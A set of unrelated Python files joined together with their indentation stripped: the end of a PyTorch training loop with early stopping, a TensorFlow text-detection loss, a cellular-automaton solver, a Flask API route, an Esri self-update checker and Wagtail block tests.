score = self.evaluate(islice(dataset.to_dataloader(), int(max_validation_samples / batch_size)),
train_step * simulated_batch_size, 'valid_full')
if f"micro_f1_score/valid_full" in self.logger.sub_batch_metrics:
score_name = 'micro-F1'
else:
score_name = 'F1'
self.logger.info(f"Full evaluation yielded {score} {score_name}")
if not early_stopping.evaluate(score, snapshot_iteration):
self.logger.info(f"Last {early_stopping_patience} evaluations did not improve performance. "
f"Stopping run")
break
progress_bar.update()
if progress_bar.n >= progress_bar.total:
progress_bar = tqdm(total=int(self.data_manager.approximate_total_samples() / batch_size))
epoch += 1
progress_bar.set_description(f"Epoch {epoch}")
t.measure()
self._handle_shutdown()
def _train_step(self, batch, num_simulated_batches):
batch = batch_to_device(batch, self.device)
output_gpu = self.model_lm.forward_batch(batch)
# Gradient accumulation: every batch contributes only a part of the total gradient
(output_gpu.loss / num_simulated_batches).backward()
output_cpu = output_gpu.cpu()
del output_gpu
del batch
return output_cpu
def _evaluate_predictions(self, logits, labels, loss=None, partition='train'):
evaluation = dict()
for metric_name, metric_fn in self.metrics.items():
evaluation[f"{metric_name}/{partition}"] = metric_fn(logits, labels)
if loss:
evaluation[f"loss/{partition}"] = loss.item()
return evaluation
def evaluate(self, dataset, step, partition='valid'):
# Evaluate on validation set
self.model_lm.eval()
predictions = []
labels = []
with torch.no_grad():
for validation_batch in dataset:
validation_batch = batch_filter_distances(validation_batch, self.relative_distances)
validation_batch = batch_to_device(validation_batch, self.device)
output = self.model_lm.forward_batch(validation_batch).cpu()
validation_batch = batch_to_device(validation_batch, "cpu")
predictions.extend(output.logits.argmax(-1))
labels.extend(validation_batch.labels)
evaluation = self._evaluate_predictions(output.logits, validation_batch.labels,
loss=output.loss, partition=partition)
self.logger.log_sub_batch_metrics(evaluation)
self.logger.log_text("predicted words/validation",
str(self._decode_predicted_words(output, validation_batch)))
self.logger.log_text("labels/validation", str(self._decode_labels(validation_batch)))
self.model_lm.train()
if f"micro_f1_score/{partition}" in self.logger.sub_batch_metrics:
score = mean(self.logger.sub_batch_metrics[f"micro_f1_score/{partition}"])
else:
score = mean(self.logger.sub_batch_metrics[f"f1_score/{partition}"])
self.logger.flush_batch_metrics(step=step)
return score
def _decode_predicted_words(self, model_out, batch):
method_name_vocab = self.method_name_vocab if self.use_separate_vocab else self.word_vocab
if hasattr(self, 'use_pointer_network') and self.use_pointer_network:
extended_vocab_reverse = {idx: word for word, idx in batch.extended_vocabulary[0].items()}
predicted_sub_tokens = ((predicted_sub_token.argmax().item(), predicted_sub_token.max().item()) for
predicted_sub_token in model_out.logits[0][0])
return [
(extended_vocab_reverse[st] if st in extended_vocab_reverse else method_name_vocab.reverse_lookup(st),
f"{value:0.2f}") for st, value in predicted_sub_tokens]
else:
return [(method_name_vocab.reverse_lookup(predicted_sub_token.argmax().item()),
f"{predicted_sub_token.max().item():0.2f}") for
predicted_sub_token in model_out.logits[0][0]]
def _decode_labels(self, batch):
method_name_vocab = self.method_name_vocab if self.use_separate_vocab else self.word_vocab
if hasattr(self, 'use_pointer_network') and self.use_pointer_network:
extended_vocab_reverse = {idx: word for word, idx in batch.extended_vocabulary[0].items()}
label_tokens = (sub_token_label.item() for sub_token_label in batch.labels[0][0])
return [extended_vocab_reverse[lt] if lt in extended_vocab_reverse else method_name_vocab.reverse_lookup(lt)
for lt in label_tokens]
else:
return [method_name_vocab.reverse_lookup(sub_token_label.item()) for sub_token_label in batch.labels[0][0]]
def get_dataloader(self, split: str, batch_size: int):
assert split == 'train' or split == 'validation'
if split == 'train':
ds = self.dataset_train
elif split == 'validation':
ds = self.dataset_validation
dl = DataLoader(ds, batch_size=batch_size, num_workers=0,
collate_fn=ds.collate_fn)
dl = DataLoaderWrapper(dl)
return BufferedDataManager(dl)
def _handle_shutdown(self, sig=None, frame=None):
self.dataset_train.data_manager.shutdown()
self.dataset_validation.data_manager.shutdown()
sys.exit(0)
class EarlyStopping:
def __init__(self, model_manager: ModelManager, run_id, patience):
self.model_manager = model_manager
self.run_id = run_id
self.patience = patience
self.evaluation_results = dict()
self._counter = 0
self._best = 0
def evaluate(self, score, snapshot_iteration):
self.evaluation_results[snapshot_iteration] = score
sorted_results = sorted(self.evaluation_results.items(), key=lambda x: x[1], reverse=True)
print(f"Current best performing snapshots: {sorted_results}")
snapshots_to_keep = sorted_results[:self.patience]
snapshots_to_keep = [x[0] for x in snapshots_to_keep]
stored_snapshots = self.model_manager.get_available_snapshots(self.run_id)
for stored_snapshot in stored_snapshots:
if stored_snapshot not in snapshots_to_keep:
self.model_manager.delete_snapshot(self.run_id, stored_snapshot)
if score > self._best:
self._best = score
self._counter = 0
else:
self._counter += 1
print(f"Counter: {self._counter}, Best: {self._best}")
if self._counter > self.patience:
return False
else:
return True
|
import tensorflow as tf
import cfg
def quad_loss(y_true, y_pred):
# loss for inside_score
logits = y_pred[:, :, :, :1]
labels = y_true[:, :, :, :1]
# balance positive and negative samples in an image
beta = 1 - tf.reduce_mean(labels)
# first apply sigmoid activation
predicts = tf.nn.sigmoid(logits)
# log +epsilon for stable cal
inside_score_loss = tf.reduce_mean(
-1 * (beta * labels * tf.log(predicts + cfg.epsilon) +
(1 - beta) * (1 - labels) * tf.log(1 - predicts + cfg.epsilon)))
inside_score_loss *= cfg.lambda_inside_score_loss
# loss for side_vertex_code
vertex_logits = y_pred[:, :, :, 1:3]
vertex_labels = y_true[:, :, :, 1:3]
vertex_beta = 1 - (tf.reduce_mean(y_true[:, :, :, 1:2])
/ (tf.reduce_mean(labels) + cfg.epsilon))
vertex_predicts = tf.nn.sigmoid(vertex_logits)
pos = -1 * vertex_beta * vertex_labels * tf.log(vertex_predicts +
cfg.epsilon)
neg = -1 * (1 - vertex_beta) * (1 - vertex_labels) * tf.log(
1 - vertex_predicts + cfg.epsilon)
positive_weights = tf.cast(tf.equal(y_true[:, :, :, 0], 1), tf.float32)
side_vertex_code_loss = \
tf.reduce_sum(tf.reduce_sum(pos + neg, axis=-1) * positive_weights) / (
tf.reduce_sum(positive_weights) + cfg.epsilon)
side_vertex_code_loss *= cfg.lambda_side_vertex_code_loss
# loss for side_vertex_coord delta
g_hat = y_pred[:, :, :, 3:]
g_true = y_true[:, :, :, 3:]
vertex_weights = tf.cast(tf.equal(y_true[:, :, :, 1], 1), tf.float32)
pixel_wise_smooth_l1norm = smooth_l1_loss(g_hat, g_true, vertex_weights)
side_vertex_coord_loss = tf.reduce_sum(pixel_wise_smooth_l1norm) / (
tf.reduce_sum(vertex_weights) + cfg.epsilon)
side_vertex_coord_loss *= cfg.lambda_side_vertex_coord_loss
return inside_score_loss + side_vertex_code_loss + side_vertex_coord_loss
def smooth_l1_loss(prediction_tensor, target_tensor, weights):
n_q = tf.reshape(quad_norm(target_tensor), tf.shape(weights))
diff = prediction_tensor - target_tensor
abs_diff = tf.abs(diff)
abs_diff_lt_1 = tf.less(abs_diff, 1)
pixel_wise_smooth_l1norm = (tf.reduce_sum(
tf.where(abs_diff_lt_1, 0.5 * tf.square(abs_diff), abs_diff - 0.5),
axis=-1) / n_q) * weights
return pixel_wise_smooth_l1norm
def quad_norm(g_true):
shape = tf.shape(g_true)
delta_xy_matrix = tf.reshape(g_true, [-1, 2, 2])
diff = delta_xy_matrix[:, 0:1, :] - delta_xy_matrix[:, 1:2, :]
square = tf.square(diff)
distance = tf.sqrt(tf.reduce_sum(square, axis=-1))
distance *= 4.0
distance += cfg.epsilon
return tf.reshape(distance, shape[:-1])
|
import sys
import itertools
#define constants, functions
BYTE_SIZE = 8;
append_zeros = lambda bit_pattern, ideal_size: "0"*(ideal_size-len(bit_pattern))+bit_pattern;
#backtrack to produce a list of SETS, each SET contains all the possibilities; before returning the answer, we 'intersect'...
#...all the sets
def backtrack(input_seq, new_state_map):
#prepare a set of possible 'previous values' for each position in the input sequence
solution_set = [];
for index, digit in enumerate(input_seq):
possible_vals = [ append_zeros(bin(index)[2:], 3) for index, element in enumerate(new_state_map) if (element == digit) ];
solution_set.append(possible_vals);
#start recursive backtracking
def prepare_candidates(solution_set, solution_vector):
if (solution_vector):
return [ element for element in solution_set[len(solution_vector)] if (solution_vector[-1][1:] == element[:1+1]) ]
else:
return solution_set[0];
def recur_backtrack(solution_set, solution_vector=[], solution=[False]):
#check if the answer's been found
if (len(solution_vector) == len(solution_set)):
if (solution_vector[-1][1:] == solution_vector[0][:1+1]):
solution[0] = True;
else:
#prepare a list of candidates for the next step
candidate_list = prepare_candidates(solution_set, solution_vector);
for candidate in candidate_list:
#add the candidate to the solution vector
solution_vector.append(candidate);
#check if we have the correct solution
recur_backtrack(solution_set, solution_vector, solution);
#pop-out the candidate
solution_vector.pop();
#return the output
boolean_val = [False];
recur_backtrack(solution_set, solution=boolean_val);
return boolean_val[0];
#read input from the file
raw_input = open("input_test_case", "r").read();
raw_input = raw_input.split('\n');
raw_input = [ line.split(' ') for line in raw_input ];
#process each test separately
for test in raw_input:
#map input cell pattern to output cell pattern
append_zeros = lambda bit_pattern, ideal_size: "0"*(ideal_size-len(bit_pattern))+bit_pattern;
new_state_map = bin(int(test[0]))[2:];
new_state_map = append_zeros(new_state_map, BYTE_SIZE);
#start backtracking
if (backtrack(test[2], new_state_map)):
print('REACHABLE');
else:
print('GARDEN OF EDEN');
#print(raw_input);
|
from flask import json, jsonify, Blueprint
from extensions import db
from models import *
from sqlalchemy.ext.declarative import DeclarativeMeta
players_blueprint = Blueprint('players', __name__)
@players_blueprint.route('/api/players', methods=['GET'])
def players():
return jsonify([to_dict(player) for player in Players.query.all()])
#players = db.session.query(Players).all()
#arr = []
#for player in players:
# arr.append(player.serialize())
#return jsonify({"data": arr})
def to_dict(obj):
if isinstance(obj.__class__, DeclarativeMeta):
# an SQLAlchemy class
fields = {}
for field in [x for x in dir(obj) if not x.startswith('_') and x != 'metadata']:
data = obj.__getattribute__(field)
try:
json.dumps(data) # this will fail on non-encodable values, like other classes
if data is not None:
fields[field] = data
except TypeError:
pass
# a json-encodable dict
return fields
|
# ------------------------------------------------------------------------------
# Copyright 2013 Esri
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# ------------------------------------------------------------------------------
# Name: ProgramCheckandUpdate.py
# Description: Checks and Updates workflow from Github if required.
# Version: 20191117
# Requirements:
# Author: Esri Imagery Workflows team
# ------------------------------------------------------------------------------
#!/usr/bin/env pythonimport requests
from datetime import datetime
import datetime as dt
import json
import os
import io
import requests
import zipfile
from dateutil.relativedelta import *
class ProgramCheckAndUpdate(object):
def readCheckForUpdate(self, filepath):
dict_check = {}
try:
with open(filepath) as f:
content = f.read()
dict_check = json.loads(content)
return dict_check
except BaseException:
return None
def readVersionJSON(self, checkFileURL):
try:
f = requests.get(checkFileURL)
x = f.content
versionJSON = json.loads(x)
return versionJSON
except BaseException:
return None
def checkUpdate(self, dict_check, versionJSON):
try:
current_date = datetime.today().strftime('%Y-%m-%d')
latest_version = versionJSON['Version']
dict_check['LastChecked'] = current_date
currentVersion = dict_check['CurrentVersion']
if(latest_version > currentVersion):
dict_check['NewVersion'] = versionJSON['Version']
dict_check['VersionMessage'] = versionJSON['Message']
dict_check['UpdateLocation'] = versionJSON['Install']
return[True, dict_check]
else:
return[False, dict_check]
except BaseException:
return [False, None]
def UpdateLocalRepo(self, install_url, path):
if(install_url.endswith('/')):
download_url = install_url + 'archive/master.zip'
else:
download_url = install_url + '/archive/master.zip'
repo_download = requests.get(download_url)
zip_repo = zipfile.ZipFile(io.BytesIO(repo_download.content))
zip_repo.extractall(path)
def WriteNewCheckForUpdate(self, dict_check, filepath):
try:
with open(filepath, 'w') as f:
json.dump(dict_check, f, indent=4)
return True
except BaseException:
return False
def IsCheckRequired(self, dict_check):
try:
currentVersion = dict_check['CurrentVersion']
if("LastChecked" in dict_check.keys()):
if(dict_check["LastChecked"] == ""):
lastChecked = "1970-01-01"
else:
lastChecked = dict_check['LastChecked']
else:
lastChecked = "1970-01-01"
lastChecked_dateobj = datetime.strptime(lastChecked, '%Y-%m-%d')
checkForUpdate = dict_check['CheckForUpdate']
current_date = datetime.today().strftime('%Y-%m-%d')
if(checkForUpdate == "Never"):
return False
elif(checkForUpdate == "Daily"):
if(current_date > lastChecked):
return True
else:
return False
elif(checkForUpdate == "Monthly"):
update_date = (lastChecked_dateobj + dt.timedelta(days=+30)).strftime('%Y-%m-%d')
if(current_date > update_date):
return True
else:
return False
except BaseException:
return None
def run(self, localrepo_path):
try:
checkUpdateFilePath = os.path.join(localrepo_path, "CheckForUpdate.json")
chkupdate = self.readCheckForUpdate(checkUpdateFilePath)
if chkupdate is None:
return "Unable to read CheckForUpdate JSON"
if(self.IsCheckRequired(chkupdate)):
versionJSON = self.readVersionJSON(checkFileURL=chkupdate['CheckFile'])
if versionJSON is None:
return "Unable to read VersionJSON"
[update_available, dict_check] = self.checkUpdate(chkupdate, versionJSON)
self.WriteNewCheckForUpdate(dict_check, checkUpdateFilePath)
if(update_available):
if(dict_check['OnNewVersion'] == "Warn"):
return("Update Available. Please read " + str(checkUpdateFilePath))
elif(dict_check['OnNewVersion'] == "Ignore"):
return("Ignore")
elif(dict_check['OnNewVersion'] == "Update"):
self.UpdateLocalRepo(versionJSON['Install'], path=os.path.join((os.path.dirname(localrepo_path)), "Updated"))
else:
return("Incorrect Parameter. Please check OnNewVersion Parameter in " + str(checkUpdateFilePath))
else:
return("Installed version is the latest version.")
else:
try:
if(chkupdate['NewVersion'] is not (None or '')):
return("Update Available. Please read "+ str(checkUpdateFilePath))
current_date = datetime.today().strftime('%Y-%m-%d')
chkupdate['LastChecked'] = current_date
self.WriteNewCheckForUpdate(chkupdate, checkUpdateFilePath)
except Exception as e:
return(str(e))
except Exception as e:
return str(e)
|
# -*- coding: utf-8 -*
import base64
import collections
import json
import unittest
from datetime import date, datetime
from decimal import Decimal
# non-standard import name for gettext_lazy, to prevent strings from being picked up for translation
from django import forms
from django.core.exceptions import ValidationError
from django.forms.utils import ErrorList
from django.template.loader import render_to_string
from django.test import SimpleTestCase, TestCase
from django.utils.html import format_html
from django.utils.safestring import SafeData, SafeText, mark_safe
from django.utils.translation import gettext_lazy as __
from wagtail.core import blocks
from wagtail.core.models import Page
from wagtail.core.rich_text import RichText
from wagtail.tests.testapp.blocks import LinkBlock as CustomLinkBlock
from wagtail.tests.testapp.blocks import SectionBlock
from wagtail.tests.testapp.models import EventPage, SimplePage
from wagtail.tests.utils import WagtailTestUtils
class FooStreamBlock(blocks.StreamBlock):
text = blocks.CharBlock()
error = 'At least one block must say "foo"'
def clean(self, value):
value = super().clean(value)
if not any(block.value == 'foo' for block in value):
raise blocks.StreamBlockValidationError(non_block_errors=ErrorList([self.error]))
return value
class ContextCharBlock(blocks.CharBlock):
def get_context(self, value, parent_context=None):
value = str(value).upper()
return super(blocks.CharBlock, self).get_context(value, parent_context)
class TestFieldBlock(WagtailTestUtils, SimpleTestCase):
def test_charfield_render(self):
block = blocks.CharBlock()
html = block.render("Hello world!")
self.assertEqual(html, "Hello world!")
def test_charfield_render_with_template(self):
block = blocks.CharBlock(template='tests/blocks/heading_block.html')
html = block.render("Hello world!")
self.assertEqual(html, '<h1>Hello world!</h1>')
def test_charfield_form_classname(self):
"""
Meta data test for FormField; this checks if both the meta values
form_classname and classname are accepted and are rendered
in the form
"""
block = blocks.CharBlock(
form_classname='special-char-formclassname'
)
html = block.render_form("Hello world!")
self.assertEqual(html.count(' special-char-formclassname'), 1)
# Checks if it is backward compatible with classname
block_with_classname = blocks.CharBlock(
classname='special-char-classname'
)
html = block_with_classname.render_form("Hello world!")
self.assertEqual(html.count(' special-char-classname'), 1)
def test_charfield_render_with_template_with_extra_context(self):
block = ContextCharBlock(template='tests/blocks/heading_block.html')
html = block.render("Bonjour le monde!", context={
'language': 'fr',
})
self.assertEqual(html, '<h1 lang="fr">BONJOUR LE MONDE!</h1>')
def test_charfield_render_form(self):
block = blocks.CharBlock()
html = block.render_form("Hello world!")
self.assertIn('<div class="field char_field widget-text_input">', html)
self.assertInHTML('<input id="" name="" placeholder="" type="text" value="Hello world!" />', html)
def test_charfield_render_form_with_prefix(self):
block = blocks.CharBlock()
html = block.render_form("Hello world!", prefix='foo')
self.assertInHTML('<input id="foo" name="foo" placeholder="" type="text" value="Hello world!" />', html)
def test_charfield_render_form_with_error(self):
block = blocks.CharBlock()
html = block.render_form(
"Hello world!",
errors=ErrorList([ValidationError("This field is required.")]))
self.assertIn('This field is required.', html)
def test_charfield_searchable_content(self):
block = blocks.CharBlock()
content = block.get_searchable_content("Hello world!")
self.assertEqual(content, ["Hello world!"])
def test_charfield_with_validator(self):
def validate_is_foo(value):
if value != 'foo':
raise ValidationError("Value must be 'foo'")
block = blocks.CharBlock(validators=[validate_is_foo])
with self.assertRaises(ValidationError):
block.clean("bar")
def test_choicefield_render(self):
class ChoiceBlock(blocks.FieldBlock):
field = forms.ChoiceField(choices=(
('choice-1', "Choice 1"),
('choice-2', "Choice 2"),
))
block = ChoiceBlock()
html = block.render('choice-2')
self.assertEqual(html, "choice-2")
def test_choicefield_render_form(self):
class ChoiceBlock(blocks.FieldBlock):
field = forms.ChoiceField(choices=(
('choice-1', "Choice 1"),
('choice-2', "Choice 2"),
))
block = ChoiceBlock()
html = block.render_form('choice-2')
self.assertIn('<div class="field choice_field widget-select">', html)
self.assertTagInHTML('<select id="" name="" placeholder="">', html)
self.assertInHTML('<option value="choice-1">Choice 1</option>', html)
self.assertInHTML('<option value="choice-2" selected="selected">Choice 2</option>', html)
def test_searchable_content(self):
"""
FieldBlock should not return anything for `get_searchable_content` by
default. Subclasses are free to override it and provide relevant
content.
"""
class CustomBlock(blocks.FieldBlock):
field = forms.CharField(required=True)
block = CustomBlock()
self.assertEqual(block.get_searchable_content("foo bar"), [])
def test_form_handling_is_independent_of_serialisation(self):
class Base64EncodingCharBlock(blocks.CharBlock):
"""A CharBlock with a deliberately perverse JSON (de)serialisation format
so that it visibly blows up if we call to_python / get_prep_value where we shouldn't"""
def to_python(self, jsonish_value):
# decode as base64 on the way out of the JSON serialisation
return base64.b64decode(jsonish_value)
def get_prep_value(self, native_value):
# encode as base64 on the way into the JSON serialisation
return base64.b64encode(native_value)
block = Base64EncodingCharBlock()
form_html = block.render_form('hello world', 'title')
self.assertIn('value="hello world"', form_html)
value_from_form = block.value_from_datadict({'title': 'hello world'}, {}, 'title')
self.assertEqual('hello world', value_from_form)
def test_widget_media(self):
class CalendarWidget(forms.TextInput):
@property
def media(self):
return forms.Media(
css={'all': ('pretty.css',)},
js=('animations.js', 'actions.js')
)
class CalenderBlock(blocks.FieldBlock):
def __init__(self, required=True, help_text=None, max_length=None, min_length=None, **kwargs):
# Set widget to CalenderWidget
self.field = forms.CharField(
required=required,
help_text=help_text,
max_length=max_length,
min_length=min_length,
widget=CalendarWidget(),
)
super(blocks.FieldBlock, self).__init__(**kwargs)
block = CalenderBlock()
self.assertIn('pretty.css', ''.join(block.all_media().render_css()))
self.assertIn('animations.js', ''.join(block.all_media().render_js()))
def test_prepare_value_called(self):
"""
Check that Field.prepare_value is called before sending the value to
the widget for rendering.
Actual real-world use case: A Youtube field that produces YoutubeVideo
instances from IDs, but videos are entered using their full URLs.
"""
class PrefixWrapper:
prefix = 'http://example.com/'
def __init__(self, value):
self.value = value
def with_prefix(self):
return self.prefix + self.value
@classmethod
def from_prefixed(cls, value):
if not value.startswith(cls.prefix):
raise ValueError
return cls(value[len(cls.prefix):])
def __eq__(self, other):
return self.value == other.value
class PrefixField(forms.Field):
def clean(self, value):
value = super().clean(value)
return PrefixWrapper.from_prefixed(value)
def prepare_value(self, value):
return value.with_prefix()
class PrefixedBlock(blocks.FieldBlock):
def __init__(self, required=True, help_text='', **kwargs):
super().__init__(**kwargs)
self.field = PrefixField(required=required, help_text=help_text)
block = PrefixedBlock()
# Check that the form value is serialized with a prefix correctly
value = PrefixWrapper('foo')
html = block.render_form(value, 'url')
self.assertInHTML(
'<input id="url" name="url" placeholder="" type="text" value="{}" />'.format(
value.with_prefix()),
html)
# Check that the value was coerced back to a PrefixValue
data = {'url': 'http://example.com/bar'}
new_value = block.clean(block.value_from_datadict(data, {}, 'url'))
self.assertEqual(new_value, PrefixWrapper('bar'))
class TestIntegerBlock(unittest.TestCase):
def test_type(self):
block = blocks.IntegerBlock()
digit = block.value_from_form(1234)
self.assertEqual(type(digit), int)
def test_render(self):
block = blocks.IntegerBlock()
digit = block.value_from_form(1234)
self.assertEqual(digit, 1234)
def test_render_required_error(self):
block = blocks.IntegerBlock()
with self.assertRaises(ValidationError):
block.clean("")
def test_render_max_value_validation(self):
block = blocks.IntegerBlock(max_value=20)
with self.assertRaises(ValidationError):
block.clean(25)
def test_render_min_value_validation(self):
block = blocks.IntegerBlock(min_value=20)
with self.assertRaises(ValidationError):
block.clean(10)
def test_render_with_validator(self):
def validate_is_even(value):
if value % 2 > 0:
raise ValidationError("Value must be even")
block = blocks.IntegerBlock(validators=[validate_is_even])
with self.assertRaises(ValidationError):
block.clean(3)
class TestEmailBlock(unittest.TestCase):
def test_render(self):
block = blocks.EmailBlock()
email = block.render("example@email.com")
self.assertEqual(email, "example@email.com")
def test_render_required_error(self):
block = blocks.EmailBlock()
with self.assertRaises(ValidationError):
block.clean("")
def test_format_validation(self):
block = blocks.EmailBlock()
with self.assertRaises(ValidationError):
block.clean("example.email.com")
def test_render_with_validator(self):
def validate_is_example_domain(value):
if not value.endswith('@example.com'):
raise ValidationError("E-mail address must end in @example.com")
block = blocks.EmailBlock(validators=[validate_is_example_domain])
with self.assertRaises(ValidationError):
block.clean("foo@example.net")
class TestBlockQuoteBlock(unittest.TestCase):
def test_render(self):
block = blocks.BlockQuoteBlock()
quote = block.render("Now is the time...")
self.assertEqual(quote, "<blockquote>Now is the time...</blockquote>")
def test_render_with_validator(self):
def validate_is_proper_story(value):
if not value.startswith('Once upon a time'):
raise ValidationError("Value must be a proper story")
block = blocks.BlockQuoteBlock(validators=[validate_is_proper_story])
with self.assertRaises(ValidationError):
block.clean("A long, long time ago")
class TestFloatBlock(TestCase):
def test_type(self):
block = blocks.FloatBlock()
block_val = block.value_from_form(float(1.63))
self.assertEqual(type(block_val), float)
def test_render(self):
block = blocks.FloatBlock()
test_val = float(1.63)
block_val = block.value_from_form(test_val)
self.assertEqual(block_val, test_val)
def test_raises_required_error(self):
block = blocks.FloatBlock()
with self.assertRaises(ValidationError):
block.clean("")
def test_raises_max_value_validation_error(self):
block = blocks.FloatBlock(max_value=20)
with self.assertRaises(ValidationError):
block.clean('20.01')
def test_raises_min_value_validation_error(self):
block = blocks.FloatBlock(min_value=20)
with self.assertRaises(ValidationError):
block.clean('19.99')
def test_render_with_validator(self):
def validate_is_even(value):
if value % 2 > 0:
raise ValidationError("Value must be even")
block = blocks.FloatBlock(validators=[validate_is_even])
with self.assertRaises(ValidationError):
block.clean('3.0')
class TestDecimalBlock(TestCase):
def test_type(self):
block = blocks.DecimalBlock()
block_val = block.value_from_form(Decimal('1.63'))
self.assertEqual(type(block_val), Decimal)
def test_render(self):
block = blocks.DecimalBlock()
test_val = Decimal(1.63)
block_val = block.value_from_form(test_val)
self.assertEqual(block_val, test_val)
def test_raises_required_error(self):
block = blocks.DecimalBlock()
with self.assertRaises(ValidationError):
block.clean("")
def test_raises_max_value_validation_error(self):
block = blocks.DecimalBlock(max_value=20)
with self.assertRaises(ValidationError):
block.clean('20.01')
def test_raises_min_value_validation_error(self):
block = blocks.DecimalBlock(min_value=20)
with self.assertRaises(ValidationError):
block.clean('19.99')
def test_render_with_validator(self):
def validate_is_even(value):
if value % 2 > 0:
raise ValidationError("Value must be even")
block = blocks.DecimalBlock(validators=[validate_is_even])
with self.assertRaises(ValidationError):
block.clean('3.0')
class TestRegexBlock(TestCase):
def test_render(self):
block = blocks.RegexBlock(regex=r'^[0-9]{3}$')
test_val = '123'
block_val = block.value_from_form(test_val)
self.assertEqual(block_val, test_val)
def test_raises_required_error(self):
block = blocks.RegexBlock(regex=r'^[0-9]{3}$')
with self.assertRaises(ValidationError) as context:
block.clean("")
self.assertIn('This field is required.', context.exception.messages)
def test_raises_custom_required_error(self):
test_message = 'Oops, you missed a bit.'
block = blocks.RegexBlock(regex=r'^[0-9]{3}$', error_messages={
'required': test_message,
})
with self.assertRaises(ValidationError) as context:
block.clean("")
self.assertIn(test_message, context.exception.messages)
def test_raises_validation_error(self):
block = blocks.RegexBlock(regex=r'^[0-9]{3}$')
with self.assertRaises(ValidationError) as context:
block.clean("[/]")
self.assertIn('Enter a valid value.', context.exception.messages)
def test_raises_custom_error_message(self):
test_message = 'Not a valid library card number.'
block = blocks.RegexBlock(regex=r'^[0-9]{3}$', error_messages={
'invalid': test_message
})
with self.assertRaises(ValidationError) as context:
block.clean("[/]")
self.assertIn(test_message, context.exception.messages)
html = block.render_form(
"[/]",
errors=ErrorList([ValidationError(test_message)]))
self.assertIn(test_message, html)
def test_render_with_validator(self):
def validate_is_foo(value):
if value != 'foo':
raise ValidationError("Value must be 'foo'")
block = blocks.RegexBlock(regex=r'^.*$', validators=[validate_is_foo])
with self.assertRaises(ValidationError):
block.clean('bar')
class TestRichTextBlock(TestCase):
fixtures = ['test.json']
def test_get_default_with_fallback_value(self):
default_value = blocks.RichTextBlock().get_default()
self.assertIsInstance(default_value, RichText)
self.assertEqual(default_value.source, '')
def test_get_default_with_default_none(self):
default_value = blocks.RichTextBlock(default=None).get_default()
self.assertIsInstance(default_value, RichText)
self.assertEqual(default_value.source, '')
def test_get_default_with_empty_string(self):
default_value = blocks.RichTextBlock(default='').get_default()
self.assertIsInstance(default_value, RichText)
self.assertEqual(default_value.source, '')
def test_get_default_with_nonempty_string(self):
default_value = blocks.RichTextBlock(default='<p>foo</p>').get_default()
self.assertIsInstance(default_value, RichText)
self.assertEqual(default_value.source, '<p>foo</p>')
def test_get_default_with_richtext_value(self):
default_value = blocks.RichTextBlock(default=RichText('<p>foo</p>')).get_default()
self.assertIsInstance(default_value, RichText)
self.assertEqual(default_value.source, '<p>foo</p>')
def test_render(self):
block = blocks.RichTextBlock()
value = RichText('<p>Merry <a linktype="page" id="4">Christmas</a>!</p>')
result = block.render(value)
self.assertEqual(
result, '<p>Merry <a href="/events/christmas/">Christmas</a>!</p>'
)
def test_render_form(self):
"""
render_form should produce the editor-specific rendition of the rich text value
(which includes e.g. 'data-linktype' attributes on <a> elements)
"""
block = blocks.RichTextBlock(editor='hallo')
value = RichText('<p>Merry <a linktype="page" id="4">Christmas</a>!</p>')
result = block.render_form(value, prefix='richtext')
self.assertIn(
(
'<p>Merry <a data-linktype="page" data-id="4"'
' data-parent-id="3" href="/events/christmas/">Christmas</a>!</p>'
),
result
)
def test_validate_required_richtext_block(self):
block = blocks.RichTextBlock()
with self.assertRaises(ValidationError):
block.clean(RichText(''))
def test_validate_non_required_richtext_block(self):
block = blocks.RichTextBlock(required=False)
result = block.clean(RichText(''))
self.assertIsInstance(result, RichText)
self.assertEqual(result.source, '')
def test_render_with_validator(self):
def validate_contains_foo(value):
if 'foo' not in value:
raise ValidationError("Value must contain 'foo'")
block = blocks.RichTextBlock(validators=[validate_contains_foo])
with self.assertRaises(ValidationError):
block.clean(RichText('<p>bar</p>'))
def test_get_searchable_content(self):
block = blocks.RichTextBlock()
value = RichText(
'<p>Merry <a linktype="page" id="4">Christmas</a>! & a happy new year</p>\n'
'<p>Our Santa pet <b>Wagtail</b> has some cool stuff in store for you all!</p>'
)
result = block.get_searchable_content(value)
self.assertEqual(
result, [
'Merry Christmas! & a happy new year \n'
'Our Santa pet Wagtail has some cool stuff in store for you all!'
]
)
def test_get_searchable_content_whitespace(self):
block = blocks.RichTextBlock()
value = RichText('<p>mashed</p><p>po<i>ta</i>toes</p>')
result = block.get_searchable_content(value)
self.assertEqual(result, ['mashed potatoes'])
class TestChoiceBlock(WagtailTestUtils, SimpleTestCase):
def setUp(self):
from django.db.models.fields import BLANK_CHOICE_DASH
self.blank_choice_dash_label = BLANK_CHOICE_DASH[0][1]
def test_render_required_choice_block(self):
block = blocks.ChoiceBlock(choices=[('tea', 'Tea'), ('coffee', 'Coffee')])
html = block.render_form('coffee', prefix='beverage')
self.assertTagInHTML('<select id="beverage" name="beverage" placeholder="">', html)
# blank option should still be rendered for required fields
# (we may want it as an initial value)
self.assertIn('<option value="">%s</option>' % self.blank_choice_dash_label, html)
self.assertIn('<option value="tea">Tea</option>', html)
self.assertInHTML('<option value="coffee" selected="selected">Coffee</option>', html)
def test_render_required_choice_block_with_default(self):
block = blocks.ChoiceBlock(choices=[('tea', 'Tea'), ('coffee', 'Coffee')], default='tea')
html = block.render_form('coffee', prefix='beverage')
self.assertTagInHTML('<select id="beverage" name="beverage" placeholder="">', html)
# blank option should NOT be rendered if default and required are set.
self.assertNotIn('<option value="">%s</option>' % self.blank_choice_dash_label, html)
self.assertIn('<option value="tea">Tea</option>', html)
self.assertInHTML('<option value="coffee" selected="selected">Coffee</option>', html)
def test_render_required_choice_block_with_callable_choices(self):
def callable_choices():
return [('tea', 'Tea'), ('coffee', 'Coffee')]
block = blocks.ChoiceBlock(choices=callable_choices)
html = block.render_form('coffee', prefix='beverage')
self.assertTagInHTML('<select id="beverage" name="beverage" placeholder="">', html)
# blank option should still be rendered for required fields
# (we may want it as an initial value)
self.assertIn('<option value="">%s</option>' % self.blank_choice_dash_label, html)
self.assertIn('<option value="tea">Tea</option>', html)
self.assertInHTML('<option value="coffee" selected="selected">Coffee</option>', html)
